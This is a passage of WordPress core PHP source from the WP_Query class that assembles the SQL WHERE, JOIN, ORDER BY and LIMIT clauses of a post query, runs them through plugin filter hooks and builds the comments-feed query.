$query_vars['attachment'] = sanitize_title_for_query( wp_basename( $query_vars['attachment'] ) );
$query_vars['name'] = $query_vars['attachment'];
$where .= " AND {$wpdb->posts}.post_name = '" . $query_vars['attachment'] . "'";
} elseif ( is_array( $query_vars['post_name__in'] ) && ! empty( $query_vars['post_name__in'] ) ) {
$query_vars['post_name__in'] = array_map( 'sanitize_title_for_query', $query_vars['post_name__in'] );
// Duplicate array before sorting to allow for the orderby clause.
$post_name__in_for_where = array_unique( $query_vars['post_name__in'] );
sort( $post_name__in_for_where );
$post_name__in = "'" . implode( "','", $post_name__in_for_where ) . "'";
$where .= " AND {$wpdb->posts}.post_name IN ($post_name__in)";
}
// If an attachment is requested by number, let it supersede any post number.
if ( $query_vars['attachment_id'] ) {
$query_vars['p'] = absint( $query_vars['attachment_id'] );
}
// If a post number is specified, load that post.
if ( $query_vars['p'] ) {
$where .= " AND {$wpdb->posts}.ID = " . $query_vars['p'];
} elseif ( $query_vars['post__in'] ) {
// Duplicate array before sorting to allow for the orderby clause.
$post__in_for_where = $query_vars['post__in'];
$post__in_for_where = array_unique( array_map( 'absint', $post__in_for_where ) );
sort( $post__in_for_where );
$post__in = implode( ',', array_map( 'absint', $post__in_for_where ) );
$where .= " AND {$wpdb->posts}.ID IN ($post__in)";
} elseif ( $query_vars['post__not_in'] ) {
sort( $query_vars['post__not_in'] );
$post__not_in = implode( ',', array_map( 'absint', $query_vars['post__not_in'] ) );
$where .= " AND {$wpdb->posts}.ID NOT IN ($post__not_in)";
}
if ( is_numeric( $query_vars['post_parent'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_parent = %d ", $query_vars['post_parent'] );
} elseif ( $query_vars['post_parent__in'] ) {
// Duplicate array before sorting to allow for the orderby clause.
$post_parent__in_for_where = $query_vars['post_parent__in'];
$post_parent__in_for_where = array_unique( array_map( 'absint', $post_parent__in_for_where ) );
sort( $post_parent__in_for_where );
$post_parent__in = implode( ',', array_map( 'absint', $post_parent__in_for_where ) );
$where .= " AND {$wpdb->posts}.post_parent IN ($post_parent__in)";
} elseif ( $query_vars['post_parent__not_in'] ) {
sort( $query_vars['post_parent__not_in'] );
$post_parent__not_in = implode( ',', array_map( 'absint', $query_vars['post_parent__not_in'] ) );
$where .= " AND {$wpdb->posts}.post_parent NOT IN ($post_parent__not_in)";
}
if ( $query_vars['page_id'] ) {
if ( ( 'page' !== get_option( 'show_on_front' ) ) || ( get_option( 'page_for_posts' ) != $query_vars['page_id'] ) ) {
$query_vars['p'] = $query_vars['page_id'];
$where = " AND {$wpdb->posts}.ID = " . $query_vars['page_id'];
}
}
// If a search pattern is specified, load the posts that match.
if ( strlen( $query_vars['s'] ) ) {
$search = $this->parse_search( $query_vars );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the search SQL that is used in the WHERE clause of WP_Query.
*
* @since 3.0.0
*
* @param string $search Search SQL for WHERE clause.
* @param WP_Query $query The current WP_Query object.
*/
$search = apply_filters_ref_array( 'posts_search', array( $search, &$this ) );
}
// Taxonomies.
if ( ! $this->is_singular ) {
$this->parse_tax_query( $query_vars );
$clauses = $this->tax_query->get_sql( $wpdb->posts, 'ID' );
$join .= $clauses['join'];
$where .= $clauses['where'];
}
if ( $this->is_tax ) {
if ( empty( $post_type ) ) {
// Do a fully inclusive search for currently registered post types of queried taxonomies.
$post_type = array();
$taxonomies = array_keys( $this->tax_query->queried_terms );
foreach ( get_post_types( array( 'exclude_from_search' => false ) ) as $pt ) {
$object_taxonomies = 'attachment' === $pt ? get_taxonomies_for_attachments() : get_object_taxonomies( $pt );
if ( array_intersect( $taxonomies, $object_taxonomies ) ) {
$post_type[] = $pt;
}
}
if ( ! $post_type ) {
$post_type = 'any';
} elseif ( count( $post_type ) === 1 ) {
$post_type = $post_type[0];
} else {
// Sort post types to ensure same cache key generation.
sort( $post_type );
}
$post_status_join = true;
} elseif ( in_array( 'attachment', (array) $post_type, true ) ) {
$post_status_join = true;
}
}
/*
* Ensure that 'taxonomy', 'term', 'term_id', 'cat', and
* 'category_name' vars are set for backward compatibility.
*/
if ( ! empty( $this->tax_query->queried_terms ) ) {
/*
* Set 'taxonomy', 'term', and 'term_id' to the
* first taxonomy other than 'post_tag' or 'category'.
*/
if ( ! isset( $query_vars['taxonomy'] ) ) {
foreach ( $this->tax_query->queried_terms as $queried_taxonomy => $queried_items ) {
if ( empty( $queried_items['terms'][0] ) ) {
continue;
}
if ( ! in_array( $queried_taxonomy, array( 'category', 'post_tag' ), true ) ) {
$query_vars['taxonomy'] = $queried_taxonomy;
if ( 'slug' === $queried_items['field'] ) {
$query_vars['term'] = $queried_items['terms'][0];
} else {
$query_vars['term_id'] = $queried_items['terms'][0];
}
// Take the first one we find.
break;
}
}
}
// 'cat', 'category_name', 'tag_id'.
foreach ( $this->tax_query->queried_terms as $queried_taxonomy => $queried_items ) {
if ( empty( $queried_items['terms'][0] ) ) {
continue;
}
if ( 'category' === $queried_taxonomy ) {
$the_cat = get_term_by( $queried_items['field'], $queried_items['terms'][0], 'category' );
if ( $the_cat ) {
$this->set( 'cat', $the_cat->term_id );
$this->set( 'category_name', $the_cat->slug );
}
unset( $the_cat );
}
if ( 'post_tag' === $queried_taxonomy ) {
$the_tag = get_term_by( $queried_items['field'], $queried_items['terms'][0], 'post_tag' );
if ( $the_tag ) {
$this->set( 'tag_id', $the_tag->term_id );
}
unset( $the_tag );
}
}
}
if ( ! empty( $this->tax_query->queries ) || ! empty( $this->meta_query->queries ) || ! empty( $this->allow_query_attachment_by_filename ) ) {
$groupby = "{$wpdb->posts}.ID";
}
// Author/user stuff.
if ( ! empty( $query_vars['author'] ) && '0' != $query_vars['author'] ) {
$query_vars['author'] = addslashes_gpc( '' . urldecode( $query_vars['author'] ) );
$authors = array_unique( array_map( 'intval', preg_split( '/[,\s]+/', $query_vars['author'] ) ) );
sort( $authors );
foreach ( $authors as $author ) {
$key = $author > 0 ? 'author__in' : 'author__not_in';
$query_vars[ $key ][] = abs( $author );
}
$query_vars['author'] = implode( ',', $authors );
}
if ( ! empty( $query_vars['author__not_in'] ) ) {
if ( is_array( $query_vars['author__not_in'] ) ) {
$query_vars['author__not_in'] = array_unique( array_map( 'absint', $query_vars['author__not_in'] ) );
sort( $query_vars['author__not_in'] );
}
$author__not_in = implode( ',', (array) $query_vars['author__not_in'] );
$where .= " AND {$wpdb->posts}.post_author NOT IN ($author__not_in) ";
} elseif ( ! empty( $query_vars['author__in'] ) ) {
if ( is_array( $query_vars['author__in'] ) ) {
$query_vars['author__in'] = array_unique( array_map( 'absint', $query_vars['author__in'] ) );
sort( $query_vars['author__in'] );
}
$author__in = implode( ',', array_map( 'absint', array_unique( (array) $query_vars['author__in'] ) ) );
$where .= " AND {$wpdb->posts}.post_author IN ($author__in) ";
}
// Author stuff for nice URLs.
if ( '' !== $query_vars['author_name'] ) {
if ( str_contains( $query_vars['author_name'], '/' ) ) {
$query_vars['author_name'] = explode( '/', $query_vars['author_name'] );
if ( $query_vars['author_name'][ count( $query_vars['author_name'] ) - 1 ] ) {
$query_vars['author_name'] = $query_vars['author_name'][ count( $query_vars['author_name'] ) - 1 ]; // No trailing slash.
} else {
$query_vars['author_name'] = $query_vars['author_name'][ count( $query_vars['author_name'] ) - 2 ]; // There was a trailing slash.
}
}
$query_vars['author_name'] = sanitize_title_for_query( $query_vars['author_name'] );
$query_vars['author'] = get_user_by( 'slug', $query_vars['author_name'] );
if ( $query_vars['author'] ) {
$query_vars['author'] = $query_vars['author']->ID;
}
$whichauthor .= " AND ({$wpdb->posts}.post_author = " . absint( $query_vars['author'] ) . ')';
}
// Matching by comment count.
if ( isset( $query_vars['comment_count'] ) ) {
// Numeric comment count is converted to array format.
if ( is_numeric( $query_vars['comment_count'] ) ) {
$query_vars['comment_count'] = array(
'value' => (int) $query_vars['comment_count'],
);
}
if ( isset( $query_vars['comment_count']['value'] ) ) {
$query_vars['comment_count'] = array_merge(
array(
'compare' => '=',
),
$query_vars['comment_count']
);
// Fallback for invalid compare operators is '='.
$compare_operators = array( '=', '!=', '>', '>=', '<', '<=' );
if ( ! in_array( $query_vars['comment_count']['compare'], $compare_operators, true ) ) {
$query_vars['comment_count']['compare'] = '=';
}
$where .= $wpdb->prepare( " AND {$wpdb->posts}.comment_count {$query_vars['comment_count']['compare']} %d", $query_vars['comment_count']['value'] );
}
}
// MIME-Type stuff for attachment browsing.
if ( isset( $query_vars['post_mime_type'] ) && '' !== $query_vars['post_mime_type'] ) {
$whichmimetype = wp_post_mime_type_where( $query_vars['post_mime_type'], $wpdb->posts );
}
$where .= $search . $whichauthor . $whichmimetype;
if ( ! empty( $this->allow_query_attachment_by_filename ) ) {
$join .= " LEFT JOIN {$wpdb->postmeta} AS sq1 ON ( {$wpdb->posts}.ID = sq1.post_id AND sq1.meta_key = '_wp_attached_file' )";
}
if ( ! empty( $this->meta_query->queries ) ) {
$clauses = $this->meta_query->get_sql( 'post', $wpdb->posts, 'ID', $this );
$join .= $clauses['join'];
$where .= $clauses['where'];
}
$rand = ( isset( $query_vars['orderby'] ) && 'rand' === $query_vars['orderby'] );
if ( ! isset( $query_vars['order'] ) ) {
$query_vars['order'] = $rand ? '' : 'DESC';
} else {
$query_vars['order'] = $rand ? '' : $this->parse_order( $query_vars['order'] );
}
// These values of orderby should ignore the 'order' parameter.
$force_asc = array( 'post__in', 'post_name__in', 'post_parent__in' );
if ( isset( $query_vars['orderby'] ) && in_array( $query_vars['orderby'], $force_asc, true ) ) {
$query_vars['order'] = '';
}
// Order by.
if ( empty( $query_vars['orderby'] ) ) {
/*
* Boolean false or empty array blanks out ORDER BY,
* while leaving the value unset or otherwise empty sets the default.
*/
if ( isset( $query_vars['orderby'] ) && ( is_array( $query_vars['orderby'] ) || false === $query_vars['orderby'] ) ) {
$orderby = '';
} else {
$orderby = "{$wpdb->posts}.post_date " . $query_vars['order'];
}
} elseif ( 'none' === $query_vars['orderby'] ) {
$orderby = '';
} else {
$orderby_array = array();
if ( is_array( $query_vars['orderby'] ) ) {
foreach ( $query_vars['orderby'] as $_orderby => $order ) {
$orderby = addslashes_gpc( urldecode( $_orderby ) );
$parsed = $this->parse_orderby( $orderby );
if ( ! $parsed ) {
continue;
}
$orderby_array[] = $parsed . ' ' . $this->parse_order( $order );
}
$orderby = implode( ', ', $orderby_array );
} else {
$query_vars['orderby'] = urldecode( $query_vars['orderby'] );
$query_vars['orderby'] = addslashes_gpc( $query_vars['orderby'] );
foreach ( explode( ' ', $query_vars['orderby'] ) as $i => $orderby ) {
$parsed = $this->parse_orderby( $orderby );
// Only allow certain values for safety.
if ( ! $parsed ) {
continue;
}
$orderby_array[] = $parsed;
}
$orderby = implode( ' ' . $query_vars['order'] . ', ', $orderby_array );
if ( empty( $orderby ) ) {
$orderby = "{$wpdb->posts}.post_date " . $query_vars['order'];
} elseif ( ! empty( $query_vars['order'] ) ) {
$orderby .= " {$query_vars['order']}";
}
}
}
// Order search results by relevance only when another "orderby" is not specified in the query.
if ( ! empty( $query_vars['s'] ) ) {
$search_orderby = '';
if ( ! empty( $query_vars['search_orderby_title'] ) && ( empty( $query_vars['orderby'] ) && ! $this->is_feed ) || ( isset( $query_vars['orderby'] ) && 'relevance' === $query_vars['orderby'] ) ) {
$search_orderby = $this->parse_search_order( $query_vars );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the ORDER BY used when ordering search results.
*
* @since 3.7.0
*
* @param string $search_orderby The ORDER BY clause.
* @param WP_Query $query The current WP_Query instance.
*/
$search_orderby = apply_filters( 'posts_search_orderby', $search_orderby, $this );
}
if ( $search_orderby ) {
$orderby = $orderby ? $search_orderby . ', ' . $orderby : $search_orderby;
}
}
if ( is_array( $post_type ) && count( $post_type ) > 1 ) {
$post_type_cap = 'multiple_post_type';
} else {
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$post_type_object = get_post_type_object( $post_type );
if ( empty( $post_type_object ) ) {
$post_type_cap = $post_type;
}
}
if ( isset( $query_vars['post_password'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_password = %s", $query_vars['post_password'] );
if ( empty( $query_vars['perm'] ) ) {
$query_vars['perm'] = 'readable';
}
} elseif ( isset( $query_vars['has_password'] ) ) {
$where .= sprintf( " AND {$wpdb->posts}.post_password %s ''", $query_vars['has_password'] ? '!=' : '=' );
}
if ( ! empty( $query_vars['comment_status'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.comment_status = %s ", $query_vars['comment_status'] );
}
if ( ! empty( $query_vars['ping_status'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.ping_status = %s ", $query_vars['ping_status'] );
}
$skip_post_status = false;
if ( 'any' === $post_type ) {
$in_search_post_types = get_post_types( array( 'exclude_from_search' => false ) );
if ( empty( $in_search_post_types ) ) {
$post_type_where = ' AND 1=0 ';
$skip_post_status = true;
} else {
$post_type_where = " AND {$wpdb->posts}.post_type IN ('" . implode( "', '", array_map( 'esc_sql', $in_search_post_types ) ) . "')";
}
} elseif ( ! empty( $post_type ) && is_array( $post_type ) ) {
// Sort post types to ensure same cache key generation.
sort( $post_type );
$post_type_where = " AND {$wpdb->posts}.post_type IN ('" . implode( "', '", esc_sql( $post_type ) ) . "')";
} elseif ( ! empty( $post_type ) ) {
$post_type_where = $wpdb->prepare( " AND {$wpdb->posts}.post_type = %s", $post_type );
$post_type_object = get_post_type_object( $post_type );
} elseif ( $this->is_attachment ) {
$post_type_where = " AND {$wpdb->posts}.post_type = 'attachment'";
$post_type_object = get_post_type_object( 'attachment' );
} elseif ( $this->is_page ) {
$post_type_where = " AND {$wpdb->posts}.post_type = 'page'";
$post_type_object = get_post_type_object( 'page' );
} else {
$post_type_where = " AND {$wpdb->posts}.post_type = 'post'";
$post_type_object = get_post_type_object( 'post' );
}
$edit_cap = 'edit_post';
$read_cap = 'read_post';
if ( ! empty( $post_type_object ) ) {
$edit_others_cap = $post_type_object->cap->edit_others_posts;
$read_private_cap = $post_type_object->cap->read_private_posts;
} else {
$edit_others_cap = 'edit_others_' . $post_type_cap . 's';
$read_private_cap = 'read_private_' . $post_type_cap . 's';
}
$user_id = get_current_user_id();
$q_status = array();
if ( $skip_post_status ) {
$where .= $post_type_where;
} elseif ( ! empty( $query_vars['post_status'] ) ) {
$where .= $post_type_where;
$statuswheres = array();
$q_status = $query_vars['post_status'];
if ( ! is_array( $q_status ) ) {
$q_status = explode( ',', $q_status );
}
sort( $q_status );
$r_status = array();
$p_status = array();
$e_status = array();
if ( in_array( 'any', $q_status, true ) ) {
foreach ( get_post_stati( array( 'exclude_from_search' => true ) ) as $status ) {
if ( ! in_array( $status, $q_status, true ) ) {
$e_status[] = "{$wpdb->posts}.post_status <> '$status'";
}
}
} else {
foreach ( get_post_stati() as $status ) {
if ( in_array( $status, $q_status, true ) ) {
if ( 'private' === $status ) {
$p_status[] = "{$wpdb->posts}.post_status = '$status'";
} else {
$r_status[] = "{$wpdb->posts}.post_status = '$status'";
}
}
}
}
if ( empty( $query_vars['perm'] ) || 'readable' !== $query_vars['perm'] ) {
$r_status = array_merge( $r_status, $p_status );
unset( $p_status );
}
if ( ! empty( $e_status ) ) {
$statuswheres[] = '(' . implode( ' AND ', $e_status ) . ')';
}
if ( ! empty( $r_status ) ) {
if ( ! empty( $query_vars['perm'] ) && 'editable' === $query_vars['perm'] && ! current_user_can( $edit_others_cap ) ) {
$statuswheres[] = "({$wpdb->posts}.post_author = $user_id " . 'AND (' . implode( ' OR ', $r_status ) . '))';
} else {
$statuswheres[] = '(' . implode( ' OR ', $r_status ) . ')';
}
}
if ( ! empty( $p_status ) ) {
if ( ! empty( $query_vars['perm'] ) && 'readable' === $query_vars['perm'] && ! current_user_can( $read_private_cap ) ) {
$statuswheres[] = "({$wpdb->posts}.post_author = $user_id " . 'AND (' . implode( ' OR ', $p_status ) . '))';
} else {
$statuswheres[] = '(' . implode( ' OR ', $p_status ) . ')';
}
}
if ( $post_status_join ) {
$join .= " LEFT JOIN {$wpdb->posts} AS p2 ON ({$wpdb->posts}.post_parent = p2.ID) ";
foreach ( $statuswheres as $index => $statuswhere ) {
$statuswheres[ $index ] = "($statuswhere OR ({$wpdb->posts}.post_status = 'inherit' AND " . str_replace( $wpdb->posts, 'p2', $statuswhere ) . '))';
}
}
$where_status = implode( ' OR ', $statuswheres );
if ( ! empty( $where_status ) ) {
$where .= " AND ($where_status)";
}
} elseif ( ! $this->is_singular ) {
if ( 'any' === $post_type ) {
$queried_post_types = get_post_types( array( 'exclude_from_search' => false ) );
} elseif ( is_array( $post_type ) ) {
$queried_post_types = $post_type;
} elseif ( ! empty( $post_type ) ) {
$queried_post_types = array( $post_type );
} else {
$queried_post_types = array( 'post' );
}
if ( ! empty( $queried_post_types ) ) {
sort( $queried_post_types );
$status_type_clauses = array();
foreach ( $queried_post_types as $queried_post_type ) {
$queried_post_type_object = get_post_type_object( $queried_post_type );
$type_where = '(' . $wpdb->prepare( "{$wpdb->posts}.post_type = %s AND (", $queried_post_type );
// Public statuses.
$public_statuses = get_post_stati( array( 'public' => true ) );
$status_clauses = array();
foreach ( $public_statuses as $public_status ) {
$status_clauses[] = "{$wpdb->posts}.post_status = '$public_status'";
}
$type_where .= implode( ' OR ', $status_clauses );
// Add protected states that should show in the admin all list.
if ( $this->is_admin ) {
$admin_all_statuses = get_post_stati(
array(
'protected' => true,
'show_in_admin_all_list' => true,
)
);
foreach ( $admin_all_statuses as $admin_all_status ) {
$type_where .= " OR {$wpdb->posts}.post_status = '$admin_all_status'";
}
}
// Add private states that are visible to current user.
if ( is_user_logged_in() && $queried_post_type_object instanceof WP_Post_Type ) {
$read_private_cap = $queried_post_type_object->cap->read_private_posts;
$private_statuses = get_post_stati( array( 'private' => true ) );
foreach ( $private_statuses as $private_status ) {
$type_where .= current_user_can( $read_private_cap ) ? " \nOR {$wpdb->posts}.post_status = '$private_status'" : " \nOR ({$wpdb->posts}.post_author = $user_id AND {$wpdb->posts}.post_status = '$private_status')";
}
}
$type_where .= '))';
$status_type_clauses[] = $type_where;
}
if ( ! empty( $status_type_clauses ) ) {
$where .= ' AND (' . implode( ' OR ', $status_type_clauses ) . ')';
}
} else {
$where .= ' AND 1=0 ';
}
} else {
$where .= $post_type_where;
}
/*
* Apply filters on where and join prior to paging so that any
* manipulations to them are reflected in the paging by day queries.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* @since 1.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where', array( $where, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* @since 1.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join', array( $join, &$this ) );
}
// Paging.
if ( empty( $query_vars['nopaging'] ) && ! $this->is_singular ) {
$page = absint( $query_vars['paged'] );
if ( ! $page ) {
$page = 1;
}
// If 'offset' is provided, it takes precedence over 'paged'.
if ( isset( $query_vars['offset'] ) && is_numeric( $query_vars['offset'] ) ) {
$query_vars['offset'] = absint( $query_vars['offset'] );
$pgstrt = $query_vars['offset'] . ', ';
} else {
$pgstrt = absint( ( $page - 1 ) * $query_vars['posts_per_page'] ) . ', ';
}
$limits = 'LIMIT ' . $pgstrt . $query_vars['posts_per_page'];
}
// Comments feeds.
if ( $this->is_comment_feed && ! $this->is_singular ) {
if ( $this->is_archive || $this->is_search ) {
$cjoin = "JOIN {$wpdb->posts} ON ( {$wpdb->comments}.comment_post_ID = {$wpdb->posts}.ID ) $join ";
$cwhere = "WHERE comment_approved = '1' $where";
$cgroupby = "{$wpdb->comments}.comment_id";
} else { // Other non-singular, e.g. front.
$cjoin = "JOIN {$wpdb->posts} ON ( {$wpdb->comments}.comment_post_ID = {$wpdb->posts}.ID )";
$cwhere = "WHERE ( post_status = 'publish' OR ( post_status = 'inherit' AND post_type = 'attachment' ) ) AND comment_approved = '1'";
$cgroupby = '';
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the JOIN clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cjoin The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cjoin = apply_filters_ref_array( 'comment_feed_join', array( $cjoin, &$this ) );
/**
* Filters the WHERE clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cwhere The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cwhere = apply_filters_ref_array( 'comment_feed_where', array( $cwhere, &$this ) );
/**
* Filters the GROUP BY clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cgroupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cgroupby = apply_filters_ref_array( 'comment_feed_groupby', array( $cgroupby, &$this ) );
/**
* Filters the ORDER BY clause of the comments feed query before sending.
*
* @since 2.8.0
*
* @param string $corderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$corderby = apply_filters_ref_array( 'comment_feed_orderby', array( 'comment_date_gmt DESC', &$this ) );
/**
* Filters the LIMIT clause of the comments feed query before sending.
*
* @since 2.8.0
*
* @param string $climits The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$climits = apply_filters_ref_array( 'comment_feed_limits', array( 'LIMIT ' . get_option( 'posts_per_rss' ), &$this ) );
}
$cgroupby = ( ! empty( $cgroupby ) ) ? 'GROUP BY ' . $cgroupby : '';
$corderby = ( ! empty( $corderby ) ) ? 'ORDER BY ' . $corderby : '';
$climits = ( ! empty( $climits ) ) ? $climits : '';
$comments_request = "SELECT $distinct {$wpdb->comments}.comment_ID FROM {$wpdb->comments} $cjoin $cwhere $cgroupby $corderby $climits";
$key = md5( $comments_request );
$last_changed = array(
wp_cache_get_last_changed( 'comment' ),
wp_cache_get_last_changed( 'posts' ),
);
$cache_key = "comment_feed:$key";
$comment_ids = wp_cache_get_salted( $cache_key, 'comment-queries', $last_changed );
if ( false === $comment_ids ) {
$comment_ids = $wpdb->get_col( $comments_request );
wp_cache_set_salted( $cache_key, $comment_ids, 'comment-queries', $last_changed );
}
_prime_comment_caches( $comment_ids );
// Convert to WP_Comment.
/** @var WP_Comment[] */
$this->comments = array_map( 'get_comment', $comment_ids );
$this->comment_count = count( $this->comments );
$post_ids = array();
foreach ( $this->comments as $comment ) {
$post_ids[] = (int) $comment->comment_post_ID;
}
$post_ids = implode( ',', $post_ids );
$join = '';
if ( $post_ids ) {
$where = "AND {$wpdb->posts}.ID IN ($post_ids) ";
} else {
$where = 'AND 0';
}
}
$pieces = array( 'where', 'groupby', 'join', 'orderby', 'distinct', 'fields', 'limits' );
/*
* Apply post-paging filters on where and join. Only plugins that
* manipulate paging queries should use these hooks.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* Specifically for manipulating paging queries.
*
* @since 1.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where_paged', array( $where, &$this ) );
/**
* Filters the GROUP BY clause of the query.
*
* @since 2.0.0
*
* @param string $groupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$groupby = apply_filters_ref_array( 'posts_groupby', array( $groupby, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* Specifically for manipulating paging queries.
*
* @since 1.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join_paged', array( $join, &$this ) );
/**
* Filters the ORDER BY clause of the query.
*
* @since 1.5.1
*
* @param string $orderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$orderby = apply_filters_ref_array( 'posts_orderby', array( $orderby, &$this ) );
/**
* Filters the DISTINCT clause of the query.
*
* @since 2.1.0
*
* @param string $distinct The DISTINCT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$distinct = apply_filters_ref_array( 'posts_distinct', array( $distinct, &$this ) );
/**
* Filters the LIMIT clause of the query.
*
* @since 2.1.0
*
* @param string $limits The LIMIT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$limits = apply_filters_ref_array( 'post_limits', array( $limits, &$this ) );
/**
* Filters the SELECT clause of the query.
*
* @since 2.1.0
*
* @param string $fields The SELECT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$fields = apply_filters_ref_array( 'posts_fields', array( $fields, &$this ) );
/**
* Filters all query clauses at once, for convenience.
*
* Covers the WHERE, GROUP BY, JOIN, ORDER BY, DISTINCT,
* fields (SELECT), and LIMIT clauses.
*
* @since 3.1.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$clauses = (array) apply_filters_ref_array( 'posts_clauses', array( compact( $pieces ), &$this ) );
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$distinct = isset( $clauses['distinct'] ) ? $clauses['distinct'] : '';
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
}
/**
* Fires to announce the query's current selection parameters.
*
* For use by caching plugins.
*
* @since 2.3.0
*
* @param string $selection The assembled selection query.
*/
do_action( 'posts_selection', $where . $groupby . $orderby . $limits . $join );
/*
* Filters again for the benefit of caching plugins.
* Regular plugins should use the hooks above.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where_request', array( $where, &$this ) );
/**
* Filters the GROUP BY clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $groupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$groupby = apply_filters_ref_array( 'posts_groupby_request', array( $groupby, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join_request', array( $join, &$this ) );
/**
* Filters the ORDER BY clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $orderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$orderby = apply_filters_ref_array( 'posts_orderby_request', array( $orderby, &$this ) );
/**
* Filters the DISTINCT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $distinct The DISTINCT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$distinct = apply_filters_ref_array( 'posts_distinct_request', array( $distinct, &$this ) );
/**
* Filters the SELECT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $fields The SELECT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$fields = apply_filters_ref_array( 'posts_fields_request', array( $fields, &$this ) );
/**
* Filters the LIMIT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $limits The LIMIT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$limits = apply_filters_ref_array( 'post_limits_request', array( $limits, &$this ) );
/**
* Filters all query clauses at once, for convenience.
*
* For use by caching plugins.
*
* Covers the WHERE, GROUP BY, JOIN, ORDER BY, DISTINCT,
* fields (SELECT), and LIMIT clauses.
*
* @since 3.1.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$clauses = (array) apply_filters_ref_array( 'posts_clauses_request', array( compact( $pieces ), &$this ) );
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$distinct = isset( $clauses['distinct'] ) ? $clauses['distinct'] : '';
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
}
if ( ! empty( $groupby ) ) {
$groupby = 'GROUP BY ' . $groupby;
}
if ( ! empty( $orderby ) ) {
$orderby = 'ORDER BY ' . $orderby;
}
$found_rows = '';
if ( ! $query_vars['no_found_rows'] && ! empty( $limits ) ) {
$found_rows = 'SQL_CALC_FOUND_ROWS';
}
/*
* Beginning of the string is on a new line to prevent leading whitespace.
*
* The additional indentation of subsequent lines is to ensure the SQL
* queries are identical to those generated when splitting queries. This
* improves caching of the query by ensuring the same cache key is
* generated for the same database queries functionally.
